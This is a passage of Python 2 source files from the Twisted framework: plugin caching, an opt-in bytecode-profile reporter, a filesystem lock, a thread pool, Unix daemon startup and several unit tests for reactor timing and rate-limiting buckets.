provider = namedAny(module.__name__ + '.' + moduleName)
except:
log.err()
else:
entry = _generateCacheEntry(provider)
cache[moduleName] = entry
for moduleName in cache.keys():
if moduleName not in pys:
dirtyCache = True
del cache[moduleName]
topcache.update(cache)
if dirtyCache:
newCacheData = pickle.dumps(cache, 2)
tmpCacheFile = dropcache + ".new"
try:
stage = 'opening'
f = file(tmpCacheFile, 'wb')
stage = 'writing'
f.write(newCacheData)
stage = 'closing'
f.close()
stage = 'renaming'
os.rename(tmpCacheFile, dropcache)
except (OSError, IOError), e:
# A large number of errors can occur here. There's nothing we
# can really do about any of them, but they are also non-fatal
# (they only slow us down by preventing results from being
# cached). Notify the user of the error, but proceed as if it
# had not occurred.
log.msg("Error %s plugin cache file %r (%r): %r" % (
stage, tmpCacheFile, dropcache, os.strerror(e.errno)))
return topcache
import twisted.plugins
def getPlugins(interface, package=twisted.plugins):
"""Retrieve all plugins implementing the given interface beneath the given module.
@param interface: An interface class. Only plugins which
implement this interface will be returned.
@param package: A package beneath which plugins are installed. For
most uses, the default value is correct.
@return: An iterator of plugins.
"""
allDropins = getCache(package)
for dropin in allDropins.itervalues():
for plugin in dropin.plugins:
try:
adapted = interface(plugin, None)
except:
log.err()
else:
if adapted is not None:
yield adapted
# Old, backwards compatible name. Don't use this.
getPlugIns = getPlugins
__all__ = ['getPlugins']
```
#### File: twisted/python/dxprofile.py
```python
import sys, types, xmlrpclib
def rle(iterable):
"""Run length encode a list"""
iterable = iter(iterable)
runlen = 1
result = []
try:
previous = iterable.next()
except StopIteration:
return []
for element in iterable:
if element == previous:
runlen = runlen + 1
continue
else:
if isinstance(previous, (types.ListType, types.TupleType)):
previous = rle(previous)
result.append([previous, runlen])
previous = element
runlen = 1
if isinstance(previous, (types.ListType, types.TupleType)):
previous = rle(previous)
result.append([previous, runlen])
return result
def report(email, appname):
"""
Send an RLE encoded version of sys.getdxp() off to our Top Men (tm)
for analysis.
"""
if hasattr(sys, 'getdxp') and appname:
dxp = xmlrpclib.ServerProxy("http://manatee.mojam.com:7304")
dxp.add_dx_info(appname, email, sys.version_info[:3], rle(sys.getdxp()))
```
#### File: twisted/python/lockfile.py
```python
__metaclass__ = type
import errno, os
from time import time as _uniquefloat
def unique():
return str(long(_uniquefloat() * 1000))
try:
from os import symlink
from os import readlink
from os import remove as rmlink
from os import rename as mvlink
except:
# XXX Implement an atomic thingamajig for win32
import shutil
def symlink(value, filename):
newlinkname = filename+"."+unique()+'.newlink'
newvalname = os.path.join(newlinkname,"symlink")
os.mkdir(newlinkname)
f = open(newvalname,'wb')
f.write(value)
f.flush()
f.close()
try:
os.rename(newlinkname, filename)
except:
os.remove(newvalname)
os.rmdir(newlinkname)
raise
def readlink(filename):
return open(os.path.join(filename,'symlink'),'rb').read()
def rmlink(filename):
shutil.rmtree(filename)
def mvlink(src, dest):
try:
shutil.rmtree(dest)
except:
pass
os.rename(src,dest)
class FilesystemLock:
"""A mutex.
This relies on the filesystem property that creating
a symlink is an atomic operation and that it will
fail if the symlink already exists. Deleting the
symlink will release the lock.
@ivar name: The name of the file associated with this lock.
@ivar clean: Indicates whether this lock was released cleanly by its
last owner. Only meaningful after C{lock} has been called and returns
True.
"""
clean = None
locked = False
def __init__(self, name):
self.name = name
def lock(self):
"""Acquire this lock.
@rtype: C{bool}
@return: True if the lock is acquired, false otherwise.
@raise: Any exception os.symlink() may raise, other than
EEXIST.
"""
try:
pid = readlink(self.name)
except (OSError, IOError), e:
if e.errno != errno.ENOENT:
raise
self.clean = True
else:
if not hasattr(os, 'kill'):
return False
try:
os.kill(int(pid), 0)
except (OSError, IOError), e:
if e.errno != errno.ESRCH:
raise
rmlink(self.name)
self.clean = False
else:
return False
symlink(str(os.getpid()), self.name)
self.locked = True
return True
def unlock(self):
"""Release this lock.
This deletes the directory with the given name.
@raise: Any exception os.readlink() may raise, or
ValueError if the lock is not owned by this process.
"""
pid = readlink(self.name)
if int(pid) != os.getpid():
raise ValueError("Lock %r not owned by this process" % (self.name,))
rmlink(self.name)
self.locked = False
def isLocked(name):
"""Determine if the lock of the given name is held or not.
@type name: C{str}
@param name: The filesystem path to the lock to test
@rtype: C{bool}
@return: True if the lock is held, False otherwise.
"""
l = FilesystemLock(name)
result = None
try:
result = l.lock()
finally:
if result:
l.unlock()
return not result
__all__ = ['FilesystemLock', 'isLocked']
```
#### File: twisted/python/threadpool.py
```python
import Queue
import threading
import threadable
import copy
import sys
# Twisted Imports
from twisted.python import log, runtime, context
class WorkerStop:
pass
WorkerStop = WorkerStop()
# initialize threading
threadable.init(1)
class ThreadPool:
"""
This class (hopefully) generalizes the functionality of a pool of
threads to which work can be dispatched.
dispatch(), dispatchWithCallback() and stop() should only be called from
a single thread, unless you make a subclass where stop() and
_startSomeWorkers() are synchronized.
"""
__inited = 0
min = 5
max = 20
joined = 0
started = 0
workers = 0
name = None
def __init__(self, minthreads=5, maxthreads=20, name=None):
"""Create a new threadpool.
@param minthreads: minimum number of threads in the pool
@param maxthreads: maximum number of threads in the pool
"""
assert minthreads >= 0, 'minimum is negative'
assert minthreads <= maxthreads, 'minimum is greater than maximum'
self.q = Queue.Queue(0)
self.min = minthreads
self.max = maxthreads
self.name = name
if runtime.platform.getType() != "java":
self.waiters = []
self.threads = []
self.working = []
else:
self.waiters = ThreadSafeList()
self.threads = ThreadSafeList()
self.working = ThreadSafeList()
def start(self):
"""Start the threadpool.
"""
self.joined = 0
self.started = 1
# Start some threads.
self.adjustPoolsize()
def startAWorker(self):
self.workers = self.workers + 1
name = "PoolThread-%s-%s" % (self.name or id(self), self.workers)
try:
firstJob = self.q.get(0)
except Queue.Empty:
firstJob = None
newThread = threading.Thread(target=self._worker, name=name, args=(firstJob,))
self.threads.append(newThread)
newThread.start()
def stopAWorker(self):
self.q.put(WorkerStop)
self.workers = self.workers-1
def __setstate__(self, state):
self.__dict__ = state
ThreadPool.__init__(self, self.min, self.max)
def __getstate__(self):
state = {}
state['min'] = self.min
state['max'] = self.max
return state
def _startSomeWorkers(self):
while (
self.workers < self.max and # Don't create too many
len(self.waiters) < self.q.qsize() # but create enough
):
self.startAWorker()
def dispatch(self, owner, func, *args, **kw):
"""Dispatch a function to be a run in a thread.
"""
self.callInThread(func,*args,**kw)
def callInThread(self, func, *args, **kw):
if self.joined:
return
ctx = context.theContextTracker.currentContext().contexts[-1]
o = (ctx, func, args, kw)
self.q.put(o)
if self.started:
self._startSomeWorkers()
def _runWithCallback(self, callback, errback, func, args, kwargs):
try:
result = apply(func, args, kwargs)
except:
errback(sys.exc_info()[1])
else:
callback(result)
def dispatchWithCallback(self, owner, callback, errback, func, *args, **kw):
"""Dispatch a function, returning the result to a callback function.
The callback function will be called in the thread - make sure it is
thread-safe.
"""
self.callInThread(self._runWithCallback, callback, errback, func, args, kw)
def _worker(self, o):
ct = threading.currentThread()
while 1:
if o is WorkerStop:
break
elif o is not None:
self.working.append(ct)
ctx, function, args, kwargs = o
try:
context.call(ctx, function, *args, **kwargs)
except:
context.call(ctx, log.deferr)
self.working.remove(ct)
del o, ctx, function, args, kwargs
self.waiters.append(ct)
o = self.q.get()
self.waiters.remove(ct)
self.threads.remove(ct)
def stop(self):
"""Shutdown the threads in the threadpool."""
self.joined = 1
threads = copy.copy(self.threads)
for thread in range(self.workers):
self.q.put(WorkerStop)
self.workers = self.workers-1
# and let's just make sure
# FIXME: threads that have died before calling stop() are not joined.
for thread in threads:
thread.join()
def adjustPoolsize(self, minthreads=None, maxthreads=None):
if minthreads is None:
minthreads = self.min
if maxthreads is None:
maxthreads = self.max
assert minthreads >= 0, 'minimum is negative'
assert minthreads <= maxthreads, 'minimum is greater than maximum'
self.min = minthreads
self.max = maxthreads
if not self.started:
return
# Kill of some threads if we have too many.
while self.workers > self.max:
self.stopAWorker()
# Start some threads if we have too few.
while self.workers < self.min:
self.startAWorker()
# Start some threads if there is a need.
self._startSomeWorkers()
def dumpStats(self):
log.msg('queue: %s' % self.q.queue)
log.msg('waiters: %s' % self.waiters)
log.msg('workers: %s' % self.working)
log.msg('total: %s' % self.threads)
class ThreadSafeList:
"""In Jython 2.1 lists aren't thread-safe, so this wraps it."""
def __init__(self):
self.lock = threading.Lock()
self.l = []
def append(self, i):
self.lock.acquire()
try:
self.l.append(i)
finally:
self.lock.release()
def remove(self, i):
self.lock.acquire()
try:
self.l.remove(i)
finally:
self.lock.release()
def __len__(self):
return len(self.l)
```
#### File: twisted/scripts/_twistd_unix.py
```python
from twisted.python import log, syslog
from twisted.python.util import switchUID
from twisted.application import app, service
from twisted.scripts import mktap
from twisted import copyright
import os, errno, sys
class ServerOptions(app.ServerOptions):
synopsis = "Usage: twistd [options]"
optFlags = [['nodaemon','n', "don't daemonize"],
['quiet', 'q', "No-op for backwards compatability."],
['originalname', None, "Don't try to change the process name"],
['syslog', None, "Log to syslog, not to file"],
['euid', '',
"Set only effective user-id rather than real user-id. "
"(This option has no effect unless the server is running as "
"root, in which case it means not to shed all privileges "
"after binding ports, retaining the option to regain "
"privileges in cases such as spawning processes. "
"Use with caution.)"],
]
optParameters = [
['prefix', None,'twisted',
"use the given prefix when syslogging"],
['pidfile','','twistd.pid',
"Name of the pidfile"],
['chroot', None, None,
'Chroot to a supplied directory before running'],
['uid', 'u', None, "The uid to run as."],
['gid', 'g', None, "The gid to run as."],
]
zsh_altArgDescr = {"prefix":"Use the given prefix when syslogging (default: twisted)",
"pidfile":"Name of the pidfile (default: twistd.pid)",}
#zsh_multiUse = ["foo", "bar"]
#zsh_mutuallyExclusive = [("foo", "bar"), ("bar", "baz")]
zsh_actions = {"pidfile":'_files -g "*.pid"', "chroot":'_dirs'}
zsh_actionDescr = {"chroot":"chroot directory"}
def opt_version(self):
"""Print version information and exit.
"""
print 'twistd (the Twisted daemon) %s' % copyright.version
print copyright.copyright
sys.exit()
def postOptions(self):
app.ServerOptions.postOptions(self)
if self['pidfile']:
self['pidfile'] = os.path.abspath(self['pidfile'])
def checkPID(pidfile):
if not pidfile:
return
if os.path.exists(pidfile):
try:
pid = int(open(pidfile).read())
except ValueError:
sys.exit('Pidfile %s contains non-numeric value' % pidfile)
try:
os.kill(pid, 0)
except OSError, why:
if why[0] == errno.ESRCH:
# The pid doesnt exists.
log.msg('Removing stale pidfile %s' % pidfile, isError=True)
os.remove(pidfile)
else:
sys.exit("Can't check status of PID %s from pidfile %s: %s" %
(pid, pidfile, why[1]))
else:
sys.exit("""\
Another twistd server is running, PID %s\n
This could either be a previously started instance of your application or a
different application entirely. To start a new one, either run it in some other
directory, or use the --pidfile and --logfile parameters to avoid clashes.
""" % pid)
def removePID(pidfile):
if not pidfile:
return
try:
os.unlink(pidfile)
except OSError, e:
if e.errno == errno.EACCES or e.errno == errno.EPERM:
log.msg("Warning: No permission to delete pid file")
else:
log.msg("Failed to unlink PID file:")
log.deferr()
except:
log.msg("Failed to unlink PID file:")
log.deferr()
def startLogging(logfilename, sysLog, prefix, nodaemon):
if logfilename == '-':
if not nodaemon:
print 'daemons cannot log to stdout'
os._exit(1)
logFile = sys.stdout
elif sysLog:
syslog.startLogging(prefix)
elif nodaemon and not logfilename:
logFile = sys.stdout
else:
logFile = app.getLogFile(logfilename or 'twistd.log')
try:
import signal
except ImportError:
pass
else:
def rotateLog(signal, frame):
from twisted.internet import reactor
reactor.callFromThread(logFile.rotate)
signal.signal(signal.SIGUSR1, rotateLog)
if not sysLog:
log.startLogging(logFile)
sys.stdout.flush()
def daemonize():
# See http://www.erlenstar.demon.co.uk/unix/faq_toc.html#TOC16
if os.fork(): # launch child and...
os._exit(0) # kill off parent
os.setsid()
if os.fork(): # launch child and...
os._exit(0) # kill off parent again.
os.umask(077)
null=os.open('/dev/null', os.O_RDWR)
for i in range(3):
try:
os.dup2(null, i)
except OSError, e:
if e.errno != errno.EBADF:
raise
os.close(null)
def shedPrivileges(euid, uid, gid):
if uid is not None or gid is not None:
switchUID(uid, gid, euid)
extra = euid and 'e' or ''
log.msg('set %suid/%sgid %s/%s' % (extra, extra, uid, gid))
def launchWithName(name):
if name and name != sys.argv[0]:
exe = os.path.realpath(sys.executable)
log.msg('Changing process name to ' + name)
os.execv(exe, [name, sys.argv[0], '--originalname']+sys.argv[1:])
def setupEnvironment(config):
if config['chroot'] is not None:
os.chroot(config['chroot'])
if config['rundir'] == '.':
config['rundir'] = '/'
os.chdir(config['rundir'])
if not config['nodaemon']:
daemonize()
if config['pidfile']:
open(config['pidfile'],'wb').write(str(os.getpid()))
def startApplication(config, application):
process = service.IProcess(application, None)
if not config['originalname']:
launchWithName(process.processName)
setupEnvironment(config)
service.IService(application).privilegedStartService()
uid, gid = mktap.getid(config['uid'], config['gid'])
if uid is None:
uid = process.uid
if gid is None:
gid = process.gid
shedPrivileges(config['euid'], uid, gid)
app.startApplication(application, not config['no_save'])
class UnixApplicationRunner(app.ApplicationRunner):
"""
An ApplicationRunner which does Unix-specific things, like fork,
shed privileges, and maintain a PID file.
"""
def preApplication(self):
"""
Do pre-application-creation setup.
"""
checkPID(self.config['pidfile'])
self.config['nodaemon'] = (self.config['nodaemon']
or self.config['debug'])
self.oldstdout = sys.stdout
self.oldstderr = sys.stderr
startLogging(self.config['logfile'], self.config['syslog'],
self.config['prefix'], self.config['nodaemon'])
app.initialLog()
def postApplication(self):
"""
To be called after the application is created: start the
application and run the reactor. After the reactor stops,
clean up PID files and such.
"""
startApplication(self.config, self.application)
app.runReactorWithLogging(self.config, self.oldstdout, self.oldstderr)
removePID(self.config['pidfile'])
app.reportProfile(self.config['report-profile'],
service.IProcess(self.application).processName)
log.msg("Server Shut Down.")
```
#### File: twisted/test/app_qtstub.py
```python
import sys
from twisted.application import reactors
class QTNotImporter:
"""
Import hook which unilaterally rejects any attempt to import
C{qtreactor} so that we can reliably test the behavior of attempting to
install it when it is not present.
"""
def find_module(self, fullname, path):
"""
Reject attempts to import C{qtreactor}. Ignore everything else.
"""
if fullname == 'qtreactor':
raise ImportError('qtreactor does not exist!')
def main():
"""
Try to install the reactor named C{qt}. Expect it to not work. Print
diagnostics to stdout if something goes wrong, print nothing otherwise.
"""
sys.meta_path.insert(0, QTNotImporter())
try:
reactors.installReactor('qt')
except reactors.NoSuchReactor, e:
if e.args != ('qt',):
print 'Wrong arguments to NoSuchReactor:', e.args
else:
# Do nothing to indicate success.
pass
else:
print 'installed qtreactor succesfully'
sys.stdout.flush()
if __name__ == '__main__':
main()
```
#### File: twisted/test/proto_helpers.py
```python
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
from twisted.protocols import basic
from twisted.internet import error
class LineSendingProtocol(basic.LineReceiver):
lostConn = False
def __init__(self, lines, start = True):
self.lines = lines[:]
self.response = []
self.start = start
def connectionMade(self):
if self.start:
map(self.sendLine, self.lines)
def lineReceived(self, line):
if not self.start:
map(self.sendLine, self.lines)
self.lines = []
self.response.append(line)
def connectionLost(self, reason):
self.lostConn = True
class FakeDatagramTransport:
noAddr = object()
def __init__(self):
self.written = []
def write(self, packet, addr=noAddr):
self.written.append((packet, addr))
class StringTransport:
disconnecting = 0
hostAddr = None
peerAddr = None
def __init__(self, hostAddress=None, peerAddress=None):
self.clear()
if hostAddress is not None:
self.hostAddr = hostAddress
if peerAddress is not None:
self.peerAddr = peerAddress
def clear(self):
self.io = StringIO()
def value(self):
return self.io.getvalue()
def write(self, data):
self.io.write(data)
def writeSequence(self, data):
self.io.write(''.join(data))
def loseConnection(self):
pass
def getPeer(self):
if self.peerAddr is None:
return ('StringIO', repr(self.io))
return self.peerAddr
def getHost(self):
if self.hostAddr is None:
return ('StringIO', repr(self.io))
return self.hostAddr
class StringTransportWithDisconnection(StringTransport):
def loseConnection(self):
self.protocol.connectionLost(error.ConnectionDone("Bye."))
```
#### File: twisted/test/test_assertions.py
```python
from twisted.trial import unittest
from twisted.python import failure
class Assertions(unittest.TestCase):
def testExceptions(self):
exc = self.assertRaises(ZeroDivisionError, lambda: 1/0)
assert isinstance(exc, ZeroDivisionError), "ZeroDivisionError instance not returned"
for func in [lambda: 1/0, lambda: None]:
try:
self.assertRaises(ValueError, func)
except unittest.FailTest:
# Success!
pass
except:
raise unittest.FailTest("FailTest not raised", failure.Failure().getTraceback())
else:
raise unittest.FailTest("FailTest not raised")
```
#### File: twisted/test/test_extensions.py
```python
import os
from os.path import join as opj
from twisted.trial import unittest
from twisted.python import util
class CorrectComments(unittest.TestCase):
def testNoSlashSlashComments(self):
urlarg = util.sibpath(__file__, opj(os.pardir, 'protocols', '_c_urlarg.c'))
contents = file(urlarg).read()
self.assertEquals(contents.find('//'), -1)
```
#### File: twisted/test/test_htb.py
```python
__version__ = '$Revision: 1.3 $'[11:-2]
from twisted.trial import unittest
from twisted.protocols import htb
class DummyClock:
time = 0
def set(self, when):
self.time = when
def __call__(self):
return self.time
class SomeBucket(htb.Bucket):
maxburst = 100
rate = 2
class TestBucketBase(unittest.TestCase):
def setUp(self):
self._realTimeFunc = htb.time
self.clock = DummyClock()
htb.time = self.clock
def tearDown(self):
htb.time = self._realTimeFunc
class TestBucket(TestBucketBase):
def testBucketSize(self):
"""Testing the size of the bucket."""
b = SomeBucket()
fit = b.add(1000)
self.failUnlessEqual(100, fit)
def testBucketDrian(self):
"""Testing the bucket's drain rate."""
b = SomeBucket()
fit = b.add(1000)
self.clock.set(10)
fit = b.add(1000)
self.failUnlessEqual(20, fit)
class TestBucketNesting(TestBucketBase):
def setUp(self):
TestBucketBase.setUp(self)
self.parent = SomeBucket()
self.child1 = SomeBucket(self.parent)
self.child2 = SomeBucket(self.parent)
def testBucketParentSize(self):
# Use up most of the parent bucket.
self.child1.add(90)
fit = self.child2.add(90)
self.failUnlessEqual(10, fit)
def testBucketParentRate(self):
# Make the parent bucket drain slower.
self.parent.rate = 1
# Fill both child1 and parent.
self.child1.add(100)
self.clock.set(10)
fit = self.child1.add(100)
# How much room was there? The child bucket would have had 20,
# but the parent bucket only ten (so no, it wouldn't make too much
# sense to have a child bucket draining faster than its parent in a real
# application.)
self.failUnlessEqual(10, fit)
# TODO: Test the Transport stuff?
from test_pcp import DummyConsumer
class ConsumerShaperTest(TestBucketBase):
def setUp(self):
TestBucketBase.setUp(self)
self.underlying = DummyConsumer()
self.bucket = SomeBucket()
self.shaped = htb.ShapedConsumer(self.underlying, self.bucket)
def testRate(self):
# Start off with a full bucket, so the burst-size dosen't factor in
# to the calculations.
delta_t = 10
self.bucket.add(100)
self.shaped.write("x" * 100)
self.clock.set(delta_t)
self.shaped.resumeProducing()
self.failUnlessEqual(len(self.underlying.getvalue()),
delta_t * self.bucket.rate)
def testBucketRefs(self):
self.failUnlessEqual(self.bucket._refcount, 1)
self.shaped.stopProducing()
self.failUnlessEqual(self.bucket._refcount, 0)
```
#### File: twisted/test/test_internet.py
```python
from twisted.trial import unittest
from twisted.internet import reactor, protocol, error, abstract, defer
from twisted.internet import interfaces, base
from twisted.test.time_helpers import Clock
try:
from twisted.internet import ssl
except ImportError:
ssl = None
if ssl and not ssl.supported:
ssl = None
from twisted.internet.defer import Deferred, maybeDeferred
from twisted.python import util
import os
import sys
import time
import types
class SystemEventTestCase(unittest.TestCase):
def setUp(self):
self.triggers = []
def addTrigger(self, event, phase, func):
t = reactor.addSystemEventTrigger(event, phase, func)
self.triggers.append(t)
return t
def removeTrigger(self, trigger):
reactor.removeSystemEventTrigger(trigger)
self.triggers.remove(trigger)
def tearDown(self):
for t in self.triggers:
try:
reactor.removeSystemEventTrigger(t)
except:
pass
def testTriggerSystemEvent1(self):
l = []
l2 = []
d = Deferred()
d2 = Deferred()
def _returnDeferred(d=d):
return d
def _returnDeferred2(d2=d2):
return d2
def _appendToList(l=l):
l.append(1)
def _appendToList2(l2=l2):
l2.append(1)
## d.addCallback(lambda x: sys.stdout.write("firing d\n"))
## d2.addCallback(lambda x: sys.stdout.write("firing d2\n"))
r = reactor
self.addTrigger("before", "test", _appendToList)
self.addTrigger("during", "test", _appendToList)
self.addTrigger("after", "test", _appendToList)
self.assertEquals(len(l), 0, "Nothing happened yet.")
r.fireSystemEvent("test")
r.iterate()
self.assertEquals(len(l), 3, "Should have filled the list.")
l[:]=[]
self.addTrigger("before", "defer", _returnDeferred)
self.addTrigger("before", "defer", _returnDeferred2)
self.addTrigger("during", "defer", _appendToList)
self.addTrigger("after", "defer", _appendToList)
r.fireSystemEvent("defer")
self.assertEquals(len(l), 0, "Event should not have fired yet.")
d.callback(None)
self.assertEquals(len(l), 0, "Event still should not have fired yet.")
d2.callback(None)
self.assertEquals(len(l), 2)
l[:]=[]
a = self.addTrigger("before", "remove", _appendToList)
b = self.addTrigger("before", "remove", _appendToList2)
self.removeTrigger(b)
r.fireSystemEvent("remove")
self.assertEquals(len(l), 1)
self.assertEquals(len(l2), 0)
def testTriggerSystemEvent2(self):
# one of the "before" trigger functions returns a deferred. A later
# "before" trigger fires the deferred. A third before runs. Then a
# "during" should be run. One of the failure modes for the old
# cReactor code is to start the "during" as soon as the deferred
# fires, rather than waiting for the "before" phase to be finished
l = []
d = Deferred()
d2 = Deferred()
def _returnDeferred(d=d):
return d
def _fireDeferred(d=d):
d.callback(None)
def _returnDeferred2(d2=d2):
return d2
def _appendToList(l=l):
l.append(1)
r = reactor
# to test this properly, the triggers must fire in this sequence:
# _returnDeferred, _fireDeferred, _returnDeferred2 . cReactor happens
# to run triggers in the order in which they were added.
self.addTrigger("before", "defer2", _returnDeferred)
self.addTrigger("before", "defer2", _fireDeferred)
self.addTrigger("before", "defer2", _returnDeferred2)
self.addTrigger("during", "defer2", _appendToList)
self.addTrigger("after", "defer2", _appendToList)
r.fireSystemEvent("defer2")
self.assertEquals(len(l), 0, "Event should not have fired yet.")
d2.callback(None)
self.assertEquals(len(l), 2)
def testTriggerSystemEvent3(self):
# make sure reactor can survive the loss of an event type while
# waiting for a before-trigger's Deferred to fire
l = []
d = Deferred()
d2 = Deferred()
def _returnDeferred(d=d):
return d
def _appendToList(l=l):
l.append(1)
def _ignore(failure):
return None
r = reactor
b1 = self.addTrigger("before", "defer3", _returnDeferred)
b2 = self.addTrigger("after", "defer3", _appendToList)
r.fireSystemEvent("defer3")
self.assertEquals(len(l), 0, "Event should not have fired yet.")
self.removeTrigger(b1)
self.removeTrigger(b2)
try:
d.callback(None) # cReactor gives errback to deferred
except ValueError:
pass
self.assertEquals(len(l), 0)
d.addErrback(_ignore)
def testTriggerSystemEvent4(self):
# make sure interleaved event types do not interfere with each other.
# Old cReactor code had a single defer_list for all event types.
l = []
l2 = []
d = Deferred()
d2 = Deferred()
def _returnDeferred(d=d):
return d
def _returnDeferred2(d2=d2):
return d2
def _appendToList(l=l):
l.append(1)
def _appendToList2(l2=l2):
l2.append(1)
r = reactor
self.addTrigger("before", "event1", _returnDeferred)
self.addTrigger("after", "event1", _appendToList)
self.addTrigger("before", "event2", _returnDeferred2)
self.addTrigger("after", "event2", _appendToList2)
r.fireSystemEvent("event1")
# event1 should be waiting on deferred 'd'
r.fireSystemEvent("event2")
# event2 should be waiting on deferred 'd2'
self.assertEquals(len(l), 0, "Event should not have fired yet.")
self.assertEquals(len(l2), 0, "Event should not have fired yet.")
d.callback(None)
# event1 should run "during" and "after" stages
# event2 should still be waiting on d2
self.assertEquals(len(l), 1)
self.assertEquals(len(l2), 0)
d2.callback(None)
# event2 should run "during" and "after" stages
self.assertEquals(len(l), 1)
self.assertEquals(len(l2), 1)
def testTriggerSystemEvent5(self):
# make sure the reactor can handle attempts to remove bogus triggers
l = []
def _appendToList(l=l):
l.append(1)
r = reactor
b = self.addTrigger("after", "event1", _appendToList)
self.removeTrigger(b)
if type(b) == types.IntType:
bogus = b + 40
self.failUnlessRaises(ValueError,
r.removeSystemEventTrigger, bogus)
self.failUnlessRaises(TypeError,
r.removeSystemEventTrigger, None)
class InterfaceTestCase(unittest.TestCase):
"""
Tests for a random pile of crap in twisted.internet, I suppose.
"""
def test_callLater(self):
"""
Test that a DelayedCall really calls the function it is supposed to call.
"""
d = Deferred()
reactor.callLater(0, d.callback, None)
d.addCallback(self.assertEqual, None)
return d
def test_cancelDelayedCall(self):
"""
Test that when a DelayedCall is cancelled it does not run.
"""
called = []
def function():
called.append(None)
call = reactor.callLater(0, function)
call.cancel()
# Schedule a call in two "iterations" to check to make sure that the
# above call never ran.
d = Deferred()
def check():
try:
self.assertEqual(called, [])
except:
d.errback()
else:
d.callback(None)
reactor.callLater(0, reactor.callLater, 0, check)
return d
def test_cancelCancelledDelayedCall(self):
"""
Test that cancelling a DelayedCall which has already been cancelled
raises the appropriate exception.
"""
call = reactor.callLater(0, lambda: None)
call.cancel()
self.assertRaises(error.AlreadyCancelled, call.cancel)
def test_cancelCalledDelayedCallSynchronous(self):
"""
Test that cancelling a DelayedCall in the DelayedCall's function as
that function is being invoked by the DelayedCall raises the
appropriate exception.
"""
d = Deferred()
def later():
try:
self.assertRaises(error.AlreadyCalled, call.cancel)
except:
d.errback()
else:
d.callback(None)
call = reactor.callLater(0, later)
return d
def test_cancelCalledDelayedCallAsynchronous(self):
"""
Test that cancelling a DelayedCall after it has run its function
raises the appropriate exception.
"""
d = Deferred()
def check():
try:
self.assertRaises(error.AlreadyCalled, call.cancel)
except:
d.errback()
else:
d.callback(None)
def later():
reactor.callLater(0, check)
call = reactor.callLater(0, later)
return d
def testCallLaterDelayAndReset(self):
clock = Clock()
clock.install()
try:
callbackTimes = [None, None]
def resetCallback():
callbackTimes[0] = clock()
def delayCallback():
callbackTimes[1] = clock()
ireset = reactor.callLater(2, resetCallback)
idelay = reactor.callLater(3, delayCallback)
clock.pump(reactor, [0, 1])
ireset.reset(2) # (now)1 + 2 = 3
idelay.delay(3) # (orig)3 + 3 = 6
clock.pump(reactor, [0, 1])
self.assertIdentical(callbackTimes[0], None)
self.assertIdentical(callbackTimes[0], None)
clock.pump(reactor, [0, 1])
self.assertEquals(callbackTimes[0], 3)
self.assertEquals(callbackTimes[1], None)
clock.pump(reactor, [0, 3])
self.assertEquals(callbackTimes[1], 6)
finally:
clock.uninstall()
def testCallLaterTime(self):
d = reactor.callLater(10, lambda: None)
try:
self.failUnless(d.getTime() - (time.time() + 10) < 1)
finally:
d.cancel()
def testCallInNextIteration(self):
calls = []
def f1():
calls.append('f1')
reactor.callLater(0.0, f2)
def f2():
calls.append('f2')
reactor.callLater(0.0, f3)
def f3():
calls.append('f3')
reactor.callLater(0, f1)
self.assertEquals(calls, [])
reactor.iterate()
self.assertEquals(calls, ['f1'])
reactor.iterate()
self.assertEquals(calls, ['f1', 'f2'])
reactor.iterate()
self.assertEquals(calls, ['f1', 'f2', 'f3'])
def testCallLaterOrder(self):
l = []
l2 = []
def f(x):
l.append(x)
def f2(x):
l2.append(x)
def done():
self.assertEquals(l, range(20))
def done2():
self.assertEquals(l2, range(10))
for n in range(10):
reactor.callLater(0, f, n)
for n in range(10):
reactor.callLater(0, f, n+10)
reactor.callLater(0.1, f2, n)
reactor.callLater(0, done)
reactor.callLater(0.1, done2)
d = Deferred()
reactor.callLater(0.2, d.callback, None)
return d
testCallLaterOrder.todo = "See bug 1396"
testCallLaterOrder.skip = "Trial bug, todo doesn't work! See bug 1397"
def testCallLaterOrder2(self):
# This time destroy the clock resolution so that it fails reliably
# even on systems that don't have a crappy clock resolution.
def seconds():
return int(time.time())
from twisted.internet import base
from twisted.python import runtime
base_original = base.seconds
runtime_original = runtime.seconds
base.seconds = seconds
runtime.seconds = seconds
def cleanup(x):
runtime.seconds = runtime_original
base.seconds = base_original
return x
return maybeDeferred(self.testCallLaterOrder).addBoth(cleanup)
testCallLaterOrder2.todo = "See bug 1396"
testCallLaterOrder2.skip = "Trial bug, todo doesn't work! See bug 1397"
def testDelayedCallStringification(self):
# Mostly just make sure str() isn't going to raise anything for
# DelayedCalls within reason.
dc = reactor.callLater(0, lambda x, y: None, 'x', y=10)
str(dc)
dc.reset(5)
str(dc)
dc.cancel()
str(dc)
dc = reactor.callLater(0, lambda: None, x=[({'hello': u'world'}, 10j), reactor], *range(10))
str(dc)
dc.cancel()
str(dc)
def calledBack(ignored):
str(dc)
d = Deferred().addCallback(calledBack)
dc = reactor.callLater(0, d.callback, None)
str(dc)
return d
def testDelayedCallSecondsOverride(self):
"""
Test that the C{seconds} argument to DelayedCall gets used instead of
the default timing function, if it is not None.
"""
def seconds():
return 10
dc = base.DelayedCall(5, lambda: None, (), {}, lambda dc: None, lambda dc: None, seconds)
self.assertEquals(dc.getTime(), 5)
dc.reset(3)
self.assertEquals(dc.getTime(), 13)
class CallFromThreadTests(unittest.TestCase):
def testWakeUp(self):
# Make sure other threads can wake up the reactor
d = Deferred()
def wake():
time.sleep(0.1)
# callFromThread will call wakeUp for us
reactor.callFromThread(d.callback, None)
reactor.callInThread(wake)
return d
if interfaces.IReactorThreads(reactor, None) is None:
testWakeUp.skip = "Nothing to wake up for without thread support"
def _stopCallFromThreadCallback(self):
self.stopped = True
def _callFromThreadCallback(self, d):
reactor.callFromThread(self._callFromThreadCallback2, d)
reactor.callLater(0, self._stopCallFromThreadCallback)
def _callFromThreadCallback2(self, d):
try:
self.assert_(self.stopped)
except:
# Send the error to the deferred
d.errback()
else:
d.callback(None)
def testCallFromThreadStops(self):
"""
Ensure that callFromThread from inside a callFromThread
callback doesn't sit in an infinite loop and lets other
things happen too.
"""
self.stopped = False
d = defer.Deferred()
reactor.callFromThread(self._callFromThreadCallback, d)
return d
class ReactorCoreTestCase(unittest.TestCase):
def setUp(self):
self.triggers = []
self.timers = []
def addTrigger(self, event, phase, func):
t = reactor.addSystemEventTrigger(event, phase, func)
self.triggers.append(t)
return t
def removeTrigger(self, trigger):
reactor.removeSystemEventTrigger(trigger)
self.triggers.remove(trigger)
def addTimer(self, when, func):
t = reactor.callLater(when, func)
self.timers.append(t)
return t
